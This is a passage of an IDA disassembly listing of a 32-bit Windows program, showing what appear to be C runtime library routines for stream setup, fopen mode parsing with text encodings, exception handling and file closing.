cmp eax, esi
jge short loc_4080A9
mov eax, esi
loc_4080A4: ; CODE XREF: sub_40808A+12�j
mov ds:dword_434DC0, eax
loc_4080A9: ; CODE XREF: sub_40808A+16�j
push 4
push eax
call sub_40777A
test eax, eax
pop ecx
pop ecx
mov ds:dword_433DA0, eax
jnz short loc_4080DA
push 4
push esi
mov ds:dword_434DC0, esi
call sub_40777A
test eax, eax
pop ecx
pop ecx
mov ds:dword_433DA0, eax
jnz short loc_4080DA
push 1Ah
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_4080DA: ; CODE XREF: sub_40808A+30�j
; sub_40808A+49�j
xor edx, edx
mov ecx, offset off_423950
jmp short loc_4080E8
; ---------------------------------------------------------------------------
loc_4080E3: ; CODE XREF: sub_40808A+6D�j
mov eax, ds:dword_433DA0
loc_4080E8: ; CODE XREF: sub_40808A+57�j
mov [edx+eax], ecx
add ecx, 20h
add edx, 4
cmp ecx, offset dword_423BD0
jl short loc_4080E3
push 0FFFFFFFEh
pop esi
xor edx, edx
mov ecx, offset dword_423960
push edi
loc_408104: ; CODE XREF: sub_40808A+AA�j
mov edi, edx
and edi, 1Fh
imul edi, 28h
mov eax, edx
sar eax, 5
mov eax, ds:dword_433CA0[eax*4]
mov eax, [edi+eax]
cmp eax, 0FFFFFFFFh
jz short loc_408128
cmp eax, esi
jz short loc_408128
test eax, eax
jnz short loc_40812A
loc_408128: ; CODE XREF: sub_40808A+94�j
; sub_40808A+98�j
mov [ecx], esi
loc_40812A: ; CODE XREF: sub_40808A+9C�j
add ecx, 20h
inc edx
cmp ecx, offset dword_4239C0
jl short loc_408104
pop edi
xor eax, eax
pop esi
retn
sub_40808A endp
; =============== S U B R O U T I N E =======================================
sub_40813B proc near ; DATA XREF: seg001:0041D2E4�o
call sub_408D58
cmp ds:byte_425FB0, 0
jz short loc_40814E
call sub_40DFD3
loc_40814E: ; CODE XREF: sub_40813B+C�j
push ds:dword_433DA0
call sub_403603
pop ecx
retn
sub_40813B endp
; =============== S U B R O U T I N E =======================================
sub_40815B proc near ; CODE XREF: sub_403207+4F�p
; sub_4034C4+50�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, offset off_423950
cmp eax, ecx
jb short loc_40817F
cmp eax, offset dword_423BB0
ja short loc_40817F
sub eax, ecx
sar eax, 5
add eax, 10h
push eax
call sub_4059F7
pop ecx
retn
; ---------------------------------------------------------------------------
loc_40817F: ; CODE XREF: sub_40815B+B�j
; sub_40815B+12�j
add eax, 20h
push eax
call ds:dword_41D168
retn
sub_40815B endp
; =============== S U B R O U T I N E =======================================
sub_40818A proc near ; CODE XREF: sub_4084A1+66�p
; sub_408C7E+46�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
cmp eax, 14h
jge short loc_40819E
add eax, 10h
push eax
call sub_4059F7
pop ecx
retn
; ---------------------------------------------------------------------------
loc_40819E: ; CODE XREF: sub_40818A+7�j
mov eax, [esp+arg_4]
add eax, 20h
push eax
call ds:dword_41D168
retn
sub_40818A endp
; =============== S U B R O U T I N E =======================================
sub_4081AD proc near ; CODE XREF: sub_4031EA+3�p
; sub_40334C+3�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, offset off_423950
cmp eax, ecx
jb short loc_4081D1
cmp eax, offset dword_423BB0
ja short loc_4081D1
sub eax, ecx
sar eax, 5
add eax, 10h
push eax
call sub_40591F
pop ecx
retn
; ---------------------------------------------------------------------------
loc_4081D1: ; CODE XREF: sub_4081AD+B�j
; sub_4081AD+12�j
add eax, 20h
push eax
call ds:dword_41D16C
retn
sub_4081AD endp
; =============== S U B R O U T I N E =======================================
sub_4081DC proc near ; CODE XREF: sub_4084A1+7D�p
; sub_408D20+9�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
cmp eax, 14h
jge short loc_4081F0
add eax, 10h
push eax
call sub_40591F
pop ecx
retn
; ---------------------------------------------------------------------------
loc_4081F0: ; CODE XREF: sub_4081DC+7�j
mov eax, [esp+arg_4]
add eax, 20h
push eax
call ds:dword_41D16C
retn
sub_4081DC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4081FF proc near ; CODE XREF: sub_403130+9A�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, ds:dword_426484
push ebx
xor ebx, ebx
push esi
mov esi, [ebp+arg_4]
mov [ebp+var_4], eax
mov [ebp+var_C], ebx
mov [ebp+var_8], ebx
mov [ebp+var_10], ebx
jmp short loc_408220
; ---------------------------------------------------------------------------
loc_40821F: ; CODE XREF: sub_4081FF+24�j
inc esi
loc_408220: ; CODE XREF: sub_4081FF+1E�j
cmp byte ptr [esi], 20h
jz short loc_40821F
mov al, [esi]
cmp al, 61h
jz short loc_408264
cmp al, 72h
jz short loc_40825B
cmp al, 77h
jz short loc_408252
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
xor eax, eax
jmp loc_40849D
; ---------------------------------------------------------------------------
loc_408252: ; CODE XREF: sub_4081FF+32�j
mov [ebp+arg_4], 301h
jmp short loc_40826B
; ---------------------------------------------------------------------------
loc_40825B: ; CODE XREF: sub_4081FF+2E�j
or [ebp+var_4], 1
mov [ebp+arg_4], ebx
jmp short loc_40826F
; ---------------------------------------------------------------------------
loc_408264: ; CODE XREF: sub_4081FF+2A�j
mov [ebp+arg_4], 109h
loc_40826B: ; CODE XREF: sub_4081FF+5A�j
or [ebp+var_4], 2
loc_40826F: ; CODE XREF: sub_4081FF+63�j
xor ecx, ecx
inc ecx
inc esi
mov al, [esi]
cmp al, bl
push edi
jz loc_408437
mov edx, 80h
mov edi, 4000h
loc_408288: ; CODE XREF: sub_4081FF+1B6�j
cmp ecx, ebx
jz loc_4083BB
movsx eax, al
cmp eax, 53h
jg loc_40833E
jz loc_40832C
sub eax, 20h
jz loc_4083B0
sub eax, 0Bh
jz short loc_408306
dec eax
jz short loc_4082FA
sub eax, 18h
jz short loc_4082E7
sub eax, 0Ah
jz short loc_4082DF
sub eax, 4
jnz loc_408440
cmp [ebp+var_8], ebx
jnz loc_4083A5
or [ebp+arg_4], 10h
mov [ebp+var_8], 1
jmp loc_4083B0
; ---------------------------------------------------------------------------
loc_4082DF: ; CODE XREF: sub_4081FF+BC�j
or [ebp+arg_4], edx
jmp loc_4083B0
; ---------------------------------------------------------------------------
loc_4082E7: ; CODE XREF: sub_4081FF+B7�j
test byte ptr [ebp+arg_4], 40h
jnz loc_4083A5
or [ebp+arg_4], 40h
jmp loc_4083B0
; ---------------------------------------------------------------------------
loc_4082FA: ; CODE XREF: sub_4081FF+B2�j
mov [ebp+var_10], 1
jmp loc_4083A5
; ---------------------------------------------------------------------------
loc_408306: ; CODE XREF: sub_4081FF+AF�j
test byte ptr [ebp+arg_4], 2
jnz loc_4083A5
mov eax, [ebp+arg_4]
and eax, 0FFFFFFFEh
or eax, 2
mov [ebp+arg_4], eax
mov eax, [ebp+var_4]
and eax, 0FFFFFFFCh
or eax, edx
mov [ebp+var_4], eax
jmp loc_4083B0
; ---------------------------------------------------------------------------
loc_40832C: ; CODE XREF: sub_4081FF+9D�j
cmp [ebp+var_8], ebx
jnz short loc_4083A5
or [ebp+arg_4], 20h
mov [ebp+var_8], 1
jmp short loc_4083B0
; ---------------------------------------------------------------------------
loc_40833E: ; CODE XREF: sub_4081FF+97�j
sub eax, 54h
jz short loc_40839D
sub eax, 0Eh
jz short loc_40838C
dec eax
jz short loc_40837B
sub eax, 0Bh
jz short loc_408366
sub eax, 6
jnz loc_408440
test word ptr [ebp+arg_4], 0C000h
jnz short loc_4083A5
or [ebp+arg_4], edi
jmp short loc_4083B0
; ---------------------------------------------------------------------------
loc_408366: ; CODE XREF: sub_4081FF+14F�j
cmp [ebp+var_C], ebx
jnz short loc_4083A5
and [ebp+var_4], 0FFFFBFFFh
mov [ebp+var_C], 1
jmp short loc_4083B0
; ---------------------------------------------------------------------------
loc_40837B: ; CODE XREF: sub_4081FF+14A�j
cmp [ebp+var_C], ebx
jnz short loc_4083A5
or [ebp+var_4], edi
mov [ebp+var_C], 1
jmp short loc_4083B0
; ---------------------------------------------------------------------------
loc_40838C: ; CODE XREF: sub_4081FF+147�j
test word ptr [ebp+arg_4], 0C000h
jnz short loc_4083A5
or [ebp+arg_4], 8000h
jmp short loc_4083B0
; ---------------------------------------------------------------------------
loc_40839D: ; CODE XREF: sub_4081FF+142�j
test word ptr [ebp+arg_4], 1000h
jz short loc_4083A9
loc_4083A5: ; CODE XREF: sub_4081FF+CA�j
; sub_4081FF+EC�j ...
xor ecx, ecx
jmp short loc_4083B0
; ---------------------------------------------------------------------------
loc_4083A9: ; CODE XREF: sub_4081FF+1A4�j
or [ebp+arg_4], 1000h
loc_4083B0: ; CODE XREF: sub_4081FF+A6�j
; sub_4081FF+DB�j ...
inc esi
mov al, [esi]
cmp al, bl
jnz loc_408288
loc_4083BB: ; CODE XREF: sub_4081FF+8B�j
cmp [ebp+var_10], ebx
jz short loc_408437
jmp short loc_4083C3
; ---------------------------------------------------------------------------
loc_4083C2: ; CODE XREF: sub_4081FF+1C7�j
inc esi
loc_4083C3: ; CODE XREF: sub_4081FF+1C1�j
cmp byte ptr [esi], 20h
jz short loc_4083C2
push 4
push esi
push offset aCcs ; "ccs="
call sub_40EB30
add esp, 0Ch
test eax, eax
jnz short loc_408440
add esi, 4
push offset aUtf8 ; "UTF-8"
push esi
call sub_40E9B4
test eax, eax
pop ecx
pop ecx
jnz short loc_4083FC
add esi, 5
or [ebp+arg_4], 40000h
jmp short loc_408437
; ---------------------------------------------------------------------------
loc_4083FC: ; CODE XREF: sub_4081FF+1EF�j
push offset aUtf16le ; "UTF-16LE"
push esi
call sub_40E9B4
test eax, eax
pop ecx
pop ecx
jnz short loc_408419
add esi, 8
or [ebp+arg_4], 20000h
jmp short loc_408437
; ---------------------------------------------------------------------------
loc_408419: ; CODE XREF: sub_4081FF+20C�j
push offset aUnicode ; "UNICODE"
push esi
call sub_40E9B4
test eax, eax
pop ecx
pop ecx
jnz short loc_408440
add esi, 7
or [ebp+arg_4], 10000h
jmp short loc_408437
; ---------------------------------------------------------------------------
loc_408436: ; CODE XREF: sub_4081FF+23B�j
inc esi
loc_408437: ; CODE XREF: sub_4081FF+79�j
; sub_4081FF+1BF�j ...
cmp byte ptr [esi], 20h
jz short loc_408436
cmp [esi], bl
jz short loc_40845A
loc_408440: ; CODE XREF: sub_4081FF+C1�j
; sub_4081FF+154�j ...
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
jmp short loc_408478
; ---------------------------------------------------------------------------
loc_40845A: ; CODE XREF: sub_4081FF+23F�j
push 180h
push [ebp+arg_8]
lea eax, [ebp+var_10]
push [ebp+arg_4]
push [ebp+arg_0]
push eax
call sub_40E77C
add esp, 14h
test eax, eax
jz short loc_40847C
loc_408478: ; CODE XREF: sub_4081FF+259�j
xor eax, eax
jmp short loc_40849C
; ---------------------------------------------------------------------------
loc_40847C: ; CODE XREF: sub_4081FF+277�j
mov eax, [ebp+arg_C]
inc ds:dword_425FC8
mov ecx, [ebp+var_4]
mov [eax+0Ch], ecx
mov ecx, [ebp+var_10]
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], ebx
mov [eax+1Ch], ebx
mov [eax+10h], ecx
loc_40849C: ; CODE XREF: sub_4081FF+27B�j
pop edi
loc_40849D: ; CODE XREF: sub_4081FF+4E�j
pop esi
pop ebx
leave
retn
sub_4081FF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4084A1 proc near ; CODE XREF: sub_403130+54�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 10h
push offset dword_421538
call __SEH_prolog4
xor ebx, ebx
xor edi, edi
mov [ebp+var_1C], edi
push 1
call sub_4059F7
pop ecx
mov [ebp+ms_exc.disabled], ebx
xor esi, esi
loc_4084C1: ; CODE XREF: sub_4084A1+85�j
mov [ebp+var_20], esi
cmp esi, ds:dword_434DC0
jge loc_408591
mov eax, ds:dword_433DA0
lea eax, [eax+esi*4]
cmp [eax], ebx
jz short loc_40852C
mov eax, [eax]
test byte ptr [eax+0Ch], 83h
jnz short loc_408525
lea eax, [esi-3]
cmp eax, 10h
ja short loc_4084FE
lea eax, [esi+10h]
push eax
call sub_405934
pop ecx
test eax, eax
jz loc_408591
loc_4084FE: ; CODE XREF: sub_4084A1+49�j
mov eax, ds:dword_433DA0
push dword ptr [eax+esi*4]
push esi
call sub_40818A
pop ecx
pop ecx
mov eax, ds:dword_433DA0
mov eax, [eax+esi*4]
test byte ptr [eax+0Ch], 83h
jz short loc_408528
push eax
push esi
call sub_4081DC
pop ecx
pop ecx
loc_408525: ; CODE XREF: sub_4084A1+41�j
inc esi
jmp short loc_4084C1
; ---------------------------------------------------------------------------
loc_408528: ; CODE XREF: sub_4084A1+79�j
mov edi, eax
jmp short loc_40858E
; ---------------------------------------------------------------------------
loc_40852C: ; CODE XREF: sub_4084A1+39�j
shl esi, 2
push 38h
call sub_40773A
pop ecx
mov ecx, ds:dword_433DA0
mov [esi+ecx], eax
mov eax, ds:dword_433DA0
add eax, esi
cmp [eax], ebx
jz short loc_408591
push 0FA0h
mov eax, [eax]
add eax, 20h
push eax
call sub_40CB14
pop ecx
pop ecx
test eax, eax
mov eax, ds:dword_433DA0
jnz short loc_408579
push dword ptr [esi+eax]
call sub_403603
pop ecx
mov eax, ds:dword_433DA0
mov [esi+eax], ebx
jmp short loc_408591
; ---------------------------------------------------------------------------
loc_408579: ; CODE XREF: sub_4084A1+C3�j
mov eax, [esi+eax]
add eax, 20h
push eax
call ds:dword_41D168
mov eax, ds:dword_433DA0
mov edi, [esi+eax]
loc_40858E: ; CODE XREF: sub_4084A1+89�j
mov [ebp+var_1C], edi
loc_408591: ; CODE XREF: sub_4084A1+29�j
; sub_4084A1+57�j ...
cmp edi, ebx
jz short loc_4085A7
mov [edi+4], ebx
mov [edi+0Ch], ebx
mov [edi+8], ebx
mov [edi], ebx
mov [edi+1Ch], ebx
or dword ptr [edi+10h], 0FFFFFFFFh
loc_4085A7: ; CODE XREF: sub_4084A1+F2�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_4085BE
mov eax, edi
call __SEH_epilog4
retn
sub_4084A1 endp
; =============== S U B R O U T I N E =======================================
sub_4085BB proc near ; DATA XREF: seg001:00421550�o
mov edi, [ebp-1Ch]
sub_4085BB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4085BE proc near ; CODE XREF: sub_4084A1+10D�p
push 1
call sub_40591F
pop ecx
retn
sub_4085BE endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4085C8 proc near ; CODE XREF: sub_403130+8A�p
; sub_4085C8+BD�p ...
var_20 = dword ptr -20h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
push edi
mov edx, [esp+0Ch+arg_0]
mov eax, [esp+0Ch+arg_4]
mov ecx, [esp+0Ch+arg_8]
push ebp
push edx
push eax
push ecx
push ecx
push offset loc_408658
push large dword ptr fs:0
mov eax, ds:dword_423064
xor eax, esp
mov [esp+28h+var_20], eax
mov large fs:0, esp
loc_4085FA: ; CODE XREF: sub_4085C8+64�j
; sub_4085C8+80�j
mov eax, [esp+28h+arg_4]
mov ebx, [eax+8]
mov ecx, [esp+28h+arg_0]
xor ebx, [ecx]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFEh
jz short loc_40864A
mov edx, [esp+28h+arg_8]
cmp edx, 0FFFFFFFEh
jz short loc_40861C
cmp esi, edx
jbe short loc_40864A
loc_40861C: ; CODE XREF: sub_4085C8+4E�j
lea esi, [esi+esi*2]
lea ebx, [ebx+esi*4+10h]
mov ecx, [ebx]
mov [eax+0Ch], ecx
cmp dword ptr [ebx+4], 0
jnz short loc_4085FA
push 101h
mov eax, [ebx+8]
call sub_40EC5D
mov ecx, 1
mov eax, [ebx+8]
call sub_40EC7C
jmp short loc_4085FA
; ---------------------------------------------------------------------------
loc_40864A: ; CODE XREF: sub_4085C8+45�j
; sub_4085C8+52�j
pop large dword ptr fs:0
add esp, 18h
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_408658: ; DATA XREF: sub_4085C8+14�o
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_40869D
mov eax, [esp+arg_4]
mov ecx, [eax+8]
xor ecx, eax
call sub_402710
push ebp
mov ebp, [eax+18h]
push dword ptr [eax+0Ch]
push dword ptr [eax+10h]
push dword ptr [eax+14h]
call sub_4085C8
add esp, 0Ch
pop ebp
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_40869D: ; CODE XREF: sub_4085C8+A0�j
retn
sub_4085C8 endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
push dword ptr [ecx+1Ch]
push dword ptr [ecx+18h]
push dword ptr [ecx+28h]
call sub_4085C8
add esp, 0Ch
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
sub_4086BA proc near ; CODE XREF: sub_406640+89�p
push ebp
push esi
push edi
push ebx
mov ebp, edx
xor eax, eax
xor ebx, ebx
xor edx, edx
xor esi, esi
xor edi, edi
call ecx
pop ebx
pop edi
pop esi
pop ebp
retn
sub_4086BA endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_406640
loc_4086D1: ; CODE XREF: sub_406640+170�j
mov ebp, edx
mov esi, ecx
mov eax, ecx
push 1
call sub_40EC5D
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
xor edi, edi
jmp esi
; END OF FUNCTION CHUNK FOR sub_406640
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4086EA proc near ; CODE XREF: sub_406640+11F�p
push ebp
mov ebp, esp
push ebx
push esi
push edi
push 0
push 0
push offset loc_4086FF
push ecx
call sub_413976
loc_4086FF: ; DATA XREF: sub_4086EA+A�o
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4086EA endp
; =============== S U B R O U T I N E =======================================
sub_408704 proc near ; CODE XREF: sub_406640+137�p
; sub_406640+18C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebp
mov ebp, [esp+4+arg_0]
push edx
push ecx
push [esp+0Ch+arg_4]
call sub_4085C8
add esp, 0Ch
pop ebp
retn 8
sub_408704 endp
; =============== S U B R O U T I N E =======================================
sub_40871B proc near ; CODE XREF: sub_403207+10E�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push esi
call sub_408A20
push eax
call sub_40D540
test eax, eax
pop ecx
pop ecx
jz short loc_4087AD
call sub_408084
add eax, 20h
cmp esi, eax
jnz short loc_408742
xor eax, eax
jmp short loc_408751
; ---------------------------------------------------------------------------
loc_408742: ; CODE XREF: sub_40871B+21�j
call sub_408084
add eax, 40h
cmp esi, eax
jnz short loc_4087AD
xor eax, eax
inc eax
loc_408751: ; CODE XREF: sub_40871B+25�j
inc ds:dword_425FC8
test word ptr [esi+0Ch], 10Ch
jnz short loc_4087AD
push ebx
push edi
lea edi, ds:425FCCh[eax*4]
cmp dword ptr [edi], 0
mov ebx, 1000h
jnz short loc_408792
push ebx
call sub_40773A
test eax, eax
pop ecx
mov [edi], eax
jnz short loc_408792
lea eax, [esi+14h]
push 2
mov [esi+8], eax
mov [esi], eax
pop eax
mov [esi+18h], eax
mov [esi+4], eax
jmp short loc_40879F
; ---------------------------------------------------------------------------
loc_408792: ; CODE XREF: sub_40871B+55�j
; sub_40871B+62�j
mov edi, [edi]
mov [esi+8], edi
mov [esi], edi
mov [esi+18h], ebx
mov [esi+4], ebx
loc_40879F: ; CODE XREF: sub_40871B+75�j
or dword ptr [esi+0Ch], 1102h
pop edi
xor eax, eax
pop ebx
inc eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_4087AD: ; CODE XREF: sub_40871B+15�j
; sub_40871B+31�j ...
xor eax, eax
pop esi
retn
sub_40871B endp
; =============== S U B R O U T I N E =======================================
sub_4087B1 proc near ; CODE XREF: sub_403207+128�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0
jz short locret_4087DF
push esi
mov esi, [esp+4+arg_4]
test word ptr [esi+0Ch], 1000h
jz short loc_4087DE
push esi
call sub_408BDA
and dword ptr [esi+0Ch], 0FFFFEEFFh
and dword ptr [esi+18h], 0
and dword ptr [esi], 0
and dword ptr [esi+8], 0
pop ecx
loc_4087DE: ; CODE XREF: sub_4087B1+12�j
pop esi
locret_4087DF: ; CODE XREF: sub_4087B1+5�j
retn
sub_4087B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4087E0 proc near ; CODE XREF: seg000:00404034�p
var_64 = byte ptr -64h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 54h
push offset dword_421558
call __SEH_prolog4
xor edi, edi
mov [ebp+ms_exc.disabled], edi
lea eax, [ebp+var_64]
push eax
call ds:dword_41D1A8
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
push 28h
push 20h
pop esi
push esi
call sub_40777A
pop ecx
pop ecx
cmp eax, edi
jz loc_408A17
mov ds:dword_433CA0, eax
mov ds:dword_433C84, esi
lea ecx, [eax+500h]
jmp short loc_408853
; ---------------------------------------------------------------------------
loc_40882A: ; CODE XREF: sub_4087E0+75�j
mov byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
mov [eax+8], edi
mov byte ptr [eax+24h], 0
mov byte ptr [eax+25h], 0Ah
mov byte ptr [eax+26h], 0Ah
add eax, 28h
mov ecx, ds:dword_433CA0
add ecx, 500h
loc_408853: ; CODE XREF: sub_4087E0+48�j
cmp eax, ecx
jb short loc_40882A
cmp [ebp+var_32], di
jz loc_40895E
mov eax, [ebp+var_30]
cmp eax, edi
jz loc_40895E
mov edi, [eax]
lea ebx, [eax+4]
lea eax, [ebx+edi]
mov [ebp+var_1C], eax
mov eax, 800h
cmp edi, eax
jl short loc_408882
mov edi, eax
loc_408882: ; CODE XREF: sub_4087E0+9E�j
xor esi, esi
inc esi
jmp short loc_4088D9
; ---------------------------------------------------------------------------
loc_408887: ; CODE XREF: sub_4087E0+FF�j
push 28h
push 20h
call sub_40777A
pop ecx
pop ecx
test eax, eax
jz short loc_4088E3
lea ecx, ds:433CA0h[esi*4]
mov [ecx], eax
add ds:dword_433C84, 20h
lea edx, [eax+500h]
jmp short loc_4088D4
; ---------------------------------------------------------------------------
loc_4088AE: ; CODE XREF: sub_4087E0+F6�j
mov byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
and dword ptr [eax+8], 0
and byte ptr [eax+24h], 80h
mov byte ptr [eax+25h], 0Ah
mov byte ptr [eax+26h], 0Ah
add eax, 28h
mov edx, [ecx]
add edx, 500h
loc_4088D4: ; CODE XREF: sub_4087E0+CC�j
cmp eax, edx
jb short loc_4088AE
inc esi
loc_4088D9: ; CODE XREF: sub_4087E0+A5�j
cmp ds:dword_433C84, edi
jl short loc_408887
jmp short loc_4088E9
; ---------------------------------------------------------------------------
loc_4088E3: ; CODE XREF: sub_4087E0+B4�j
mov edi, ds:dword_433C84
loc_4088E9: ; CODE XREF: sub_4087E0+101�j
and [ebp+var_20], 0
test edi, edi
jle short loc_40895E
loc_4088F1: ; CODE XREF: sub_4087E0+17C�j
mov eax, [ebp+var_1C]
mov ecx, [eax]
cmp ecx, 0FFFFFFFFh
jz short loc_408951
cmp ecx, 0FFFFFFFEh
jz short loc_408951
mov al, [ebx]
test al, 1
jz short loc_408951
test al, 8
jnz short loc_408915
push ecx
call ds:dword_41D148
test eax, eax
jz short loc_408951
loc_408915: ; CODE XREF: sub_4087E0+128�j
mov esi, [ebp+var_20]
mov eax, esi
sar eax, 5
and esi, 1Fh
imul esi, 28h
add esi, ds:dword_433CA0[eax*4]
mov eax, [ebp+var_1C]
mov eax, [eax]
mov [esi], eax
mov al, [ebx]
mov [esi+4], al
push 0FA0h
lea eax, [esi+0Ch]
push eax
call sub_40CB14
pop ecx
pop ecx
test eax, eax
jz loc_408A17
inc dword ptr [esi+8]
loc_408951: ; CODE XREF: sub_4087E0+119�j
; sub_4087E0+11E�j ...
inc [ebp+var_20]
inc ebx
add [ebp+var_1C], 4
cmp [ebp+var_20], edi
jl short loc_4088F1
loc_40895E: ; CODE XREF: sub_4087E0+7B�j
; sub_4087E0+86�j ...
xor ebx, ebx
loc_408960: ; CODE XREF: sub_4087E0+213�j
mov esi, ebx
imul esi, 28h
add esi, ds:dword_433CA0
mov eax, [esi]
cmp eax, 0FFFFFFFFh
jz short loc_40897D
cmp eax, 0FFFFFFFEh
jz short loc_40897D
or byte ptr [esi+4], 80h
jmp short loc_4089EF
; ---------------------------------------------------------------------------
loc_40897D: ; CODE XREF: sub_4087E0+190�j
; sub_4087E0+195�j
mov byte ptr [esi+4], 81h
test ebx, ebx
jnz short loc_40898A
push 0FFFFFFF6h
pop eax
jmp short loc_408994
; ---------------------------------------------------------------------------
loc_40898A: ; CODE XREF: sub_4087E0+1A3�j
mov eax, ebx
dec eax
neg eax
sbb eax, eax
add eax, 0FFFFFFF5h
loc_408994: ; CODE XREF: sub_4087E0+1A8�j
push eax
call ds:dword_41D14C
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_4089E5
test edi, edi
jz short loc_4089E5
push edi
call ds:dword_41D148
test eax, eax
jz short loc_4089E5
mov [esi], edi
and eax, 0FFh
cmp eax, 2
jnz short loc_4089C3
or byte ptr [esi+4], 40h
jmp short loc_4089CC
; ---------------------------------------------------------------------------
loc_4089C3: ; CODE XREF: sub_4087E0+1DB�j
cmp eax, 3
jnz short loc_4089CC
or byte ptr [esi+4], 8
loc_4089CC: ; CODE XREF: sub_4087E0+1E1�j
; sub_4087E0+1E6�j
push 0FA0h
lea eax, [esi+0Ch]
push eax
call sub_40CB14
pop ecx
pop ecx
test eax, eax
jz short loc_408A17
inc dword ptr [esi+8]
jmp short loc_4089EF
; ---------------------------------------------------------------------------
loc_4089E5: ; CODE XREF: sub_4087E0+1C0�j
; sub_4087E0+1C4�j ...
or byte ptr [esi+4], 40h
mov dword ptr [esi], 0FFFFFFFEh
loc_4089EF: ; CODE XREF: sub_4087E0+19B�j
; sub_4087E0+203�j
inc ebx
cmp ebx, 3
jl loc_408960
push ds:dword_433C84
call ds:dword_41D150
xor eax, eax
jmp short loc_408A1A
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
loc_408A17: ; CODE XREF: sub_4087E0+31�j
; sub_4087E0+168�j ...
or eax, 0FFFFFFFFh
loc_408A1A: ; CODE XREF: sub_4087E0+227�j
call __SEH_epilog4
retn
sub_4087E0 endp
; =============== S U B R O U T I N E =======================================
sub_408A20 proc near ; CODE XREF: sub_403207+63�p
; sub_403207+6F�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
xor esi, esi
cmp eax, esi
jnz short loc_408A48
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_408A48: ; CODE XREF: sub_408A20+9�j
mov eax, [eax+10h]
pop esi
retn
sub_408A20 endp
; =============== S U B R O U T I N E =======================================
sub_408A4D proc near ; CODE XREF: sub_408AE1+94�p
; sub_40E072+340�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
push esi
call sub_40ED7D
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_408AAC
cmp esi, 1
mov eax, ds:dword_433CA0
jnz short loc_408A6F
test byte ptr [eax+54h], 1
jnz short loc_408A7A
loc_408A6F: ; CODE XREF: sub_408A4D+1A�j
cmp esi, 2
jnz short loc_408A90
test byte ptr [eax+2Ch], 1
jz short loc_408A90
loc_408A7A: ; CODE XREF: sub_408A4D+20�j
push 2
call sub_40ED7D
push 1
mov edi, eax
call sub_40ED7D
cmp eax, edi
pop ecx
pop ecx
jz short loc_408AAC
loc_408A90: ; CODE XREF: sub_408A4D+25�j
; sub_408A4D+2B�j
push esi
call sub_40ED7D
pop ecx
push eax
call ds:dword_41D0DC
test eax, eax
jnz short loc_408AAC
call ds:dword_41D0F0
mov edi, eax
jmp short loc_408AAE
; ---------------------------------------------------------------------------
loc_408AAC: ; CODE XREF: sub_408A4D+10�j
; sub_408A4D+41�j ...
xor edi, edi
loc_408AAE: ; CODE XREF: sub_408A4D+5D�j
push esi
call sub_40ECFC
mov eax, esi
and esi, 1Fh
imul esi, 28h
sar eax, 5
test edi, edi
mov eax, ds:dword_433CA0[eax*4]
pop ecx
mov byte ptr [eax+esi+4], 0
jz short loc_408ADC
push edi
call sub_4057F9
pop ecx
or eax, 0FFFFFFFFh
jmp short loc_408ADE
; ---------------------------------------------------------------------------
